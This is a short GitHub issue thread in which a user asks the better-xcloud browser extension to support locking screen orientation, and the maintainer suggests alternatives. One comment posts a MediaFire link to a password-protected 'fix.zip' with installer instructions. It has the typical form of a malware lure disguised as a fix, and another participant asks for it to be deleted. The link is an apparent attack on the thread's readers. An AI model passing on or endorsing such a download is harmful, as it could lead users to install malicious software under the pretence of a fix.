### ISSUE TITLE
[Feature] Allow to lock screen orientation

### ISSUE THREAD

**Issue by ghost** [redphx/better-xcloud#487]
### Device

Phone/Tablet

Kiwi Browser v120.0.6099.116

### Suggestion

Even when using android built in screen orientation lock feature it's still possible to switch between landscape and horizontal mode. This makes impossible to play games while laying down.

**Comment by redphx** [comment]
Either lock your phone screen or use the Android app.

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by stcry00** [comment]
@redphx it would be cool if you deleted the message above. someone might fall idk
